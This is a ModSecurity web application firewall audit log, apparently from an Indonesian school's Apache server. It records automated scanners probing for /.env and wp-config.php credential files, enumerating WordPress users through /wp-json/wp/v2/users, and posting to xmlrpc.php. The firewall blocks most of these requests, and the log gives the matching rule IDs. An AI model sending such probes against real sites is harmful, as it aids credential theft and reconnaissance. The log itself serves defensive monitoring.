user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
accept-language: en-US,en;q=0.5
upgrade-insecure-requests: 1
--58742843-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--58742843-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744960005338021 713 (- - -)
Stopwatch2: 1744960005338021 713; combined=314, p1=283, p2=0, p3=0, p4=0, p5=31, sr=126, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--58742843-Z--
--12936443-A--
[18/Apr/2025:14:06:45 +0700] aAH6BTlhhbF_BYhFYTVGRQAAAEw 103.236.140.4 60032 103.236.140.4 8181
--12936443-B--
GET /crm/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 141.148.156.201
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 141.148.156.201
X-Forwarded-Proto: http
Connection: close
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
accept-language: en-US,en;q=0.5
upgrade-insecure-requests: 1
--12936443-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--12936443-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744960005580856 873 (- - -)
Stopwatch2: 1744960005580856 873; combined=393, p1=359, p2=0, p3=0, p4=0, p5=34, sr=145, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--12936443-Z--
--8b46db00-A--
[18/Apr/2025:14:35:48 +0700] aAIA1Fyj-eUTITfvHEWSvwAAAAM 103.236.140.4 40126 103.236.140.4 8181
--8b46db00-B--
POST /dns-query HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 8.211.42.174
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 8.211.42.174
X-Forwarded-Proto: https
Connection: close
Content-Length: 37
content-type: application/dns-message
accept: application/dns-message
user-agent: Chrome
--8b46db00-C--
i test meshtrustwork
--8b46db00-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8b46db00-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1744961748407070 4425 (- - -)
Stopwatch2: 1744961748407070 4425; combined=2825, p1=638, p2=2091, p3=29, p4=33, p5=33, sr=128, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8b46db00-Z--
--e0db6d58-A--
[18/Apr/2025:14:39:11 +0700] aAIBn1yj-eUTITfvHEWTFQAAABg 103.236.140.4 40908 103.236.140.4 8181
--e0db6d58-B--
GET /.env HTTP/1.0
Host: vinic.twilightparadox.com
X-Real-IP: 159.89.127.165
X-Forwarded-Host: vinic.twilightparadox.com
X-Forwarded-Server: vinic.twilightparadox.com
X-Forwarded-For: 159.89.127.165
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--e0db6d58-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e0db6d58-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744961951015122 830 (- - -)
Stopwatch2: 1744961951015122 830; combined=326, p1=293, p2=0, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e0db6d58-Z--
--bcc9e50b-A--
[18/Apr/2025:15:30:33 +0700] aAINqTpR4B6O-aqWibMwPAAAAIU 103.236.140.4 52652 103.236.140.4 8181
--bcc9e50b-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 157.245.232.123
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 157.245.232.123
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--bcc9e50b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--bcc9e50b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744965033292528 758 (- - -)
Stopwatch2: 1744965033292528 758; combined=302, p1=265, p2=0, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bcc9e50b-Z--
--bbdc0503-A--
[18/Apr/2025:15:59:53 +0700] aAIUiTpR4B6O-aqWibMzCgAAAIk 103.236.140.4 34148 103.236.140.4 8181
--bbdc0503-B--
POST /dns-query HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.245.61.81
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.245.61.81
X-Forwarded-Proto: https
Connection: close
Content-Length: 28
content-type: application/dns-message
accept: application/dns-message
user-agent: Chrome
--bbdc0503-C--
ó googlecom
--bbdc0503-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--bbdc0503-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1744966793493372 4365 (- - -)
Stopwatch2: 1744966793493372 4365; combined=2557, p1=598, p2=1875, p3=27, p4=31, p5=26, sr=117, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bbdc0503-Z--
--6883987e-A--
[18/Apr/2025:16:50:10 +0700] aAIgUlyj-eUTITfvHEWktwAAAA8 103.236.140.4 39490 103.236.140.4 8181
--6883987e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.69.197
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.69.197
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; KYF39 Build/100.0.2039; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36
Accept-Charset: utf-8
--6883987e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6883987e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744969810448148 791 (- - -)
Stopwatch2: 1744969810448148 791; combined=334, p1=295, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6883987e-Z--
--8062b765-A--
[18/Apr/2025:16:50:43 +0700] aAIgcxk6uTiIdxrJEEQmawAAAMs 103.236.140.4 39616 103.236.140.4 8181
--8062b765-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.69.197
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.69.197
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.71 Safari/537.36 OPR/63.0.3368.17 (Edition beta)
Accept-Charset: utf-8
--8062b765-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8062b765-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744969843546496 782 (- - -)
Stopwatch2: 1744969843546496 782; combined=349, p1=315, p2=0, p3=0, p4=0, p5=34, sr=121, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8062b765-Z--
--82f9820c-A--
[18/Apr/2025:17:25:14 +0700] aAIoijpR4B6O-aqWibM97wAAAJc 103.236.140.4 47644 103.236.140.4 8181
--82f9820c-B--
GET /.env HTTP/1.0
Host: archiexnz.chickenkiller.com
X-Real-IP: 209.38.248.17
X-Forwarded-Host: archiexnz.chickenkiller.com
X-Forwarded-Server: archiexnz.chickenkiller.com
X-Forwarded-For: 209.38.248.17
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--82f9820c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--82f9820c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744971914625441 864 (- - -)
Stopwatch2: 1744971914625441 864; combined=370, p1=302, p2=0, p3=0, p4=0, p5=68, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--82f9820c-Z--
--2b86b829-A--
[18/Apr/2025:18:37:47 +0700] aAI5izlhhbF_BYhFYTVcSwAAAEc 103.236.140.4 35780 103.236.140.4 8181
--2b86b829-B--
GET /.env HTTP/1.0
Host: vinic.twilightparadox.com
X-Real-IP: 146.190.242.161
X-Forwarded-Host: vinic.twilightparadox.com
X-Forwarded-Server: vinic.twilightparadox.com
X-Forwarded-For: 146.190.242.161
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--2b86b829-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2b86b829-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744976267354541 705 (- - -)
Stopwatch2: 1744976267354541 705; combined=300, p1=271, p2=0, p3=0, p4=0, p5=29, sr=96, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2b86b829-Z--
--d82b3b3f-A--
[18/Apr/2025:19:13:49 +0700] aAJB_TlhhbF_BYhFYTVmagAAAE0 103.236.140.4 44258 103.236.140.4 8181
--d82b3b3f-B--
GET /.env HTTP/1.0
Host: petruk.hauganslekt.no
X-Real-IP: 209.97.180.8
X-Forwarded-Host: petruk.hauganslekt.no
X-Forwarded-Server: petruk.hauganslekt.no
X-Forwarded-For: 209.97.180.8
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--d82b3b3f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d82b3b3f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744978429165000 822 (- - -)
Stopwatch2: 1744978429165000 822; combined=345, p1=307, p2=0, p3=0, p4=0, p5=38, sr=103, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d82b3b3f-Z--
--6ac31f1f-A--
[18/Apr/2025:20:15:47 +0700] aAJQg1yj-eUTITfvHEXWYQAAAAw 103.236.140.4 51602 103.236.140.4 8181
--6ac31f1f-B--
GET /.env HTTP/1.0
Host: petruk.hauganslekt.no
X-Real-IP: 167.172.158.128
X-Forwarded-Host: petruk.hauganslekt.no
X-Forwarded-Server: petruk.hauganslekt.no
X-Forwarded-For: 167.172.158.128
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--6ac31f1f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6ac31f1f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744982147423247 858 (- - -)
Stopwatch2: 1744982147423247 858; combined=359, p1=318, p2=0, p3=0, p4=0, p5=41, sr=118, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6ac31f1f-Z--
--3d05fa57-A--
[18/Apr/2025:20:19:05 +0700] aAJRSTpR4B6O-aqWibNt0AAAAIs 103.236.140.4 52372 103.236.140.4 8181
--3d05fa57-B--
GET /.env HTTP/1.0
Host: wooin.epicgamer.org
X-Real-IP: 64.227.70.2
X-Forwarded-Host: wooin.epicgamer.org
X-Forwarded-Server: wooin.epicgamer.org
X-Forwarded-For: 64.227.70.2
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--3d05fa57-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3d05fa57-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744982345125843 794 (- - -)
Stopwatch2: 1744982345125843 794; combined=285, p1=251, p2=0, p3=0, p4=0, p5=33, sr=72, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3d05fa57-Z--
--e0b2af22-A--
[18/Apr/2025:20:31:23 +0700] aAJUKzlhhbF_BYhFYTWM0QAAAEM 103.236.140.4 55252 103.236.140.4 8181
--e0b2af22-B--
GET /wp-config.php HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 128.199.198.141
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: http
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Accept: */*
Cookie:
X-Forwarded-For: 128.199.198.141
Accept-Encoding: gzip
X-Varnish: 128758797
--e0b2af22-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--e0b2af22-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744983083946917 865 (- - -)
Stopwatch2: 1744983083946917 865; combined=354, p1=315, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e0b2af22-Z--
--b5f25568-A--
[18/Apr/2025:20:42:28 +0700] aAJWxDlhhbF_BYhFYTWOpQAAAE0 103.236.140.4 57872 103.236.140.4 8181
--b5f25568-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.178.238
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.178.238
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--b5f25568-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b5f25568-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744983748700215 2772 (- - -)
Stopwatch2: 1744983748700215 2772; combined=1368, p1=435, p2=903, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b5f25568-Z--
--1b35e701-A--
[18/Apr/2025:20:42:31 +0700] aAJWxzlhhbF_BYhFYTWOqQAAAEc 103.236.140.4 57888 103.236.140.4 8181
--1b35e701-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.178.238
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.178.238
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--1b35e701-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1b35e701-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744983751243084 3181 (- - -)
Stopwatch2: 1744983751243084 3181; combined=1417, p1=519, p2=869, p3=0, p4=0, p5=29, sr=128, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1b35e701-Z--
--59f70f69-A--
[18/Apr/2025:23:05:25 +0700] aAJ4RRk6uTiIdxrJEERlSQAAANE 103.236.140.4 34636 103.236.140.4 8181
--59f70f69-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 157.245.232.123
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 157.245.232.123
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--59f70f69-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--59f70f69-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744992325280118 899 (- - -)
Stopwatch2: 1744992325280118 899; combined=390, p1=352, p2=0, p3=0, p4=0, p5=38, sr=83, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--59f70f69-Z--
--1f776018-A--
[18/Apr/2025:23:35:25 +0700] aAJ_TTpR4B6O-aqWibN8OgAAAJg 103.236.140.4 43694 103.236.140.4 8181
--1f776018-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.93.110
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.93.110
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--1f776018-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1f776018-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744994125042861 3848 (- - -)
Stopwatch2: 1744994125042861 3848; combined=2207, p1=665, p2=1500, p3=0, p4=0, p5=42, sr=116, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1f776018-Z--
--7632cb22-A--
[18/Apr/2025:23:35:27 +0700] aAJ_TzlhhbF_BYhFYTWZSAAAAEc 103.236.140.4 43706 103.236.140.4 8181
--7632cb22-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.93.110
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.93.110
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--7632cb22-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7632cb22-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744994127342293 2480 (- - -)
Stopwatch2: 1744994127342293 2480; combined=1160, p1=412, p2=715, p3=0, p4=0, p5=33, sr=120, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7632cb22-Z--
--abecac51-A--
[18/Apr/2025:23:35:29 +0700] aAJ_URk6uTiIdxrJEERnUQAAAM8 103.236.140.4 43718 103.236.140.4 8181
--abecac51-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.93.110
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.93.110
X-Forwarded-Proto: http
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
